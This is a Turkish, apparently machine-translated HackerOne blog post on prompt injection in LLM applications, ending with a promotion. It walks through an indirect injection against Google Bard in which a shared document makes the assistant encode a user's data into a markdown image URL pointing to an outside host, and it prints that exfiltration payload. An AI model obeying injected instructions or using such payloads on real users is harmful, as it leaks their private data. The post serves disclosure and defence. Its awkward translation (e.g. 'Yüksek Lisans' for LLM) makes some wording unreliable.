AI İstemi Ekleme: Güvenlik Açığı, Etki ve Düzeltme


OWASP Yüksek Lisans Uygulamaları için En İyi 10, anında enjeksiyonu Yüksek Lisans’ların bir numaralı riski olarak tanımlıyor ve bunu “bir saldırganın, güvenilir bir Yüksek Lisans Programının çalışmasını hazırlanmış girdiler aracılığıyla doğrudan veya dolaylı olarak manipüle ettiği bir güvenlik açığı” olarak tanımlıyor.

Hızlı enjeksiyon, veri ihlalleri ve hırsızlık, sistemin devralınması, mali zararlar ve yasal/uyumluluk yansımaları da dahil olmak üzere bir kuruluşu önemli ölçüde etkileyebilir.

Hemen enjeksiyona daha yakından bakalım; nedir, nasıl kullanılır ve nasıl düzeltilir?

Hızlı Enjeksiyon Nedir?

Büyük dil modellerinde (LLM’ler) bilgi istemi ekleme güvenlik açıkları, model istemin bir parçası olarak kullanıcı girişini işlediğinde ortaya çıkar. Bu güvenlik açığı, kullanıcı girişinin bir SQL sorgusuna enjekte edildiği SQL enjeksiyonu veya uygulamalara kötü amaçlı komut dosyalarının enjekte edildiği Siteler Arası Komut Dosyası Çalıştırma (XSS) gibi uygulamalardaki diğer enjeksiyon türü güvenlik açıklarına benzer. Anında enjeksiyon saldırılarında, istemin içine kötü amaçlı girdi enjekte edilerek saldırganların orijinal talimatları ve kullanılan kontrolleri geçersiz kılmasına veya bozmasına olanak sağlanır.

Örneğin, okuyucular için kısa makale özetleri oluşturmak amacıyla Yüksek Lisans destekli bir özetleme aracı kullanan bir haber sitesi, doğrudan bilgi istemine eklenen kullanıcı verilerini kabul eder. Özetleme aracındaki hızlı enjeksiyon güvenlik açığı, bir saldırganın kullanıcı verilerine kötü amaçlı talimatlar eklemesine olanak tanıyabilir; bu, özetleme talimatını geçersiz kılar ve bunun yerine saldırgan tarafından sağlanan talimatı yürütür.

Hızlı enjeksiyon genel olarak iki kategoriye ayrılabilir:

  • Doğrudan Hızlı Enjeksiyon: Buna bazen ‘jailbreak’ de denir. Doğrudan istem enjeksiyonlarında saldırgan, istemler aracılığıyla LLM girişini doğrudan etkiler.
  • Dolaylı İstemi Enjeksiyon: Dolaylı bilgi istemi enjeksiyonu, bir saldırganın modelin aldığı veri kaynaklarına kötü amaçlı istemler yerleştirmesi durumunda gerçekleşir.

Hızlı Uygulamanın İş Etkisi

  1. Veri İhlalleri: Bir saldırgan, anında enjeksiyon kusuru yoluyla rastgele kod çalıştırabilirse müşteri kayıtları, finansal bilgiler, ticari sırlar vb. gibi hassas iş verilerine erişebilir ve bu verileri sızdırabilir. Bu, uyumluluk ihlallerine, yasal sorunlara, fikri mülkiyet kaybına yol açabilir. ve itibar kaybı.
  2. Sistemin Devralınması: Başarılı bir hızlı enjeksiyon saldırısı, saldırganın yüksek ayrıcalıklar elde etmesine veya savunmasız sistem üzerinde tam kontrol sahibi olmasına olanak tanıyabilir. Bu, operasyonları aksatabilir, daha fazla yanal harekete olanak sağlayabilir ve daha yıkıcı eylemler için bir dayanak sağlayabilir.
  3. Mali Kayıplar: Hızlı ekleme hatalarından yararlanılmasının neden olduğu veri ihlalleri ve hizmet kesintileri, olay müdahale maliyetleri, düzenleyici para cezaları/cezalar, müşteri güveninin ve iş fırsatlarının kaybı, fikri mülkiyet hırsızlığı ve daha fazlası nedeniyle işletmeler için önemli mali kayıplara neden olabilir.
  4. Düzenleyici Cezalar: Sektöre ve açığa çıkan verilere bağlı olarak, sistemlerin ani enjeksiyon kusurlarına karşı uygun şekilde güvence altına alınmaması, GDPR, HIPAA, PCI-DSS vb. uyumluluk düzenlemelerini ihlal edebilir ve bu da maliyetli cezalara yol açabilir.
  5. İtibar Hasarı: Aktif olarak istismar edilen bir enjeksiyon güvenlik açığının derhal kamuya açıklanması, bir şirketin güvenlik itibarını ve müşteriler ve ortaklar nezdindeki güvenilirliğini ciddi şekilde zedeleyebilir.

Bilgisayar Korsanları Hızlı Enjeksiyon Hakkında Ne Diyor?

Pek çok bilgisayar korsanı artık yapay zeka ve yüksek lisans konusunda uzmanlaşıyor ve anında enjeksiyon, keşfettikleri önemli bir güvenlik açığıdır. Güvenlik araştırmacısı Katie Paxton-Fear namı diğer @InsiderPhD bizi hızlı enjeksiyon konusunda uyarıyor ve şunları söylüyor:

“Teknolojinin olgunlaştığını ve karmaşıklığının arttığını gördükçe, onu kırmanın daha fazla yolu olacak. Anında enjeksiyon veya yapay zeka modelinin eğitim verilerini geri çağırmasını veya verileri zehirlemesini sağlamak gibi yapay zeka sistemlerine özgü güvenlik açıklarını zaten görüyoruz. Bu güvenlik zorluklarının üstesinden gelmek için yapay zekaya ve insan zekasına ihtiyacımız var.”

Bilgisayar korsanı Joseph Thacker namı diğer @rez0_, hızlı enjeksiyonun gücünü anlamak için bu örneği kullanıyor:

“Bir saldırgan, LLM işlev çağrısı bağlamının kontrolünü ele geçirmek için hızlı enjeksiyon kullanırsa, web tarayıcısı özelliğini çağırarak ve sızdırılan verileri saldırganın tarafına taşıyarak verileri sızdırabilir. Veya bir saldırgan, e-postaları okumak ve yanıtlamakla görevli bir LLM’ye anında enjeksiyon yükünü e-postayla gönderebilir.”

Hızlı Enjeksiyon Güvenlik Açığının Gerçek Dünyadan Bir Örneği

Organizasyon: Google
Güvenlik Açığı: Dolaylı İstemi Enjeksiyon

Özet

Hacker Joseph “rez0” Thacker, Johann Rehberger ve Kai Greshake, artık Gemini olarak adlandırılan GenAI asistanı Bard’ı hackleyerek Google’ın AI kırmızı ekibini güçlendirmek için işbirliği yaptı.

Bard’ın Extensions AI özelliğinin kullanıma sunulması, Bard’a Google Drive, Google Dokümanlar ve Gmail’e erişim olanağı sağladı. Bu, Bard’ın kişisel olarak tanımlanabilir bilgilere erişebileceği ve hatta e-postaları okuyabileceği, belgelere ve konumlara erişebileceği anlamına geliyordu. Bilgisayar korsanları, Bard’ın güvenilmeyen verileri analiz ettiğini ve kullanıcılara rızaları olmadan gönderilebilen dolaylı anlık enjeksiyon saldırılarına karşı duyarlı olabileceğini belirledi.

Saldırı Akışı

  • Kurban, paylaşılan bir Google Dokümanı ile etkileşim kurmak için Bard’ı kullanıyor
  • Paylaşılan Google Dokümanı, kötü amaçlarla hazırlanmış bir bilgi istemi ekleme içeriyor
  • İstemi enjeksiyon, Bard’ı ele geçirir ve onu kişisel verileri/bilgileri bir resim URL’sine kodlaması için kandırır
    • ![Data Exfiltration in Progress](https://wuzzi.net/logo.png?goog=\[DATA\_EXFILTRATION\])
  • Saldırgan sunucuyu kontrol eder ve resim URL’sine erişildiğinde yapılan GET isteği aracılığıyla kodlanmış verileri alır.
  • Saldırı, görüntülerin rastgele konumlardan oluşturulmasını engelleyebilecek İçerik Güvenliği Politikası (CSP) kısıtlamalarını atlamak için Google Apps Komut Dosyalarından yararlanır.
  • Apps Komut Dosyası, kodlanmış verileri resim URL’sinden saldırganın erişebildiği başka bir Google Dokümanına aktarmak için kullanılır.

Darbe

Bard Extensions’ın piyasaya sürülmesinden 24 saatten kısa bir süre sonra bilgisayar korsanları şunları göstermeyi başardı:

  • Google Bard, Extensions’tan gelen veriler yoluyla dolaylı anlık ekleme saldırılarına karşı savunmasızdı.
  • Kötü amaçlı görüntü işaretleme ekleme talimatları bu güvenlik açığından yararlanacaktır.
  • Hızlı bir enjeksiyon verisi, kullanıcıların sohbet geçmişini sızdırabilir.

İyileştirme

Sorun 19 Eylül 2023’te Google VRP’ye bildirildi ve bir ay sonra Google minnettar bir şekilde bir düzeltmenin yapıldığını doğruladı.

Ani enjeksiyonun azaltılmasına yönelik en iyi uygulamalar hâlâ gelişmektedir. Bununla birlikte, girişin uygun şekilde temizlenmesi, LLM güvenlik duvarlarının ve korkulukların kullanılması, erişim kontrolünün uygulanması, güvenilmeyen verilerin kod olarak yorumlanmasının engellenmesi, hızlı enjeksiyon saldırılarını önlemenin yollarından bazılarıdır.

HackerOne ile Kuruluşunuzu Anında Enjeksiyona Karşı Koruyun

Bu, hızlı enjeksiyon güvenlik açığının yaygınlığının ve etki ciddiyetinin yalnızca bir örneğidir. HackerOne ve etik hackerlardan oluşan topluluğumuz, organizasyonların hata ödülü, Hizmet Olarak Pentest (PTaaS), Kod Güvenliği Denetimi veya saldırganın zihniyetini göz önünde bulundurarak diğer çözümler aracılığıyla anında enjeksiyon ve diğer yapay zeka açıklarını tanımlamasına ve düzeltmesine yardımcı olacak en iyi donanıma sahiptir. bir güvenlik açığının keşfedilmesi.

GenAI güvenlik açıklarının etkisi hakkında daha fazla bilgi edinmek için 8. Yıllık Hacker Destekli Güvenlik Raporunu indirin veya kuruluşunuza GenAI anlık enjeksiyonunu almaya başlamak için HackerOne ile iletişime geçin.



Source link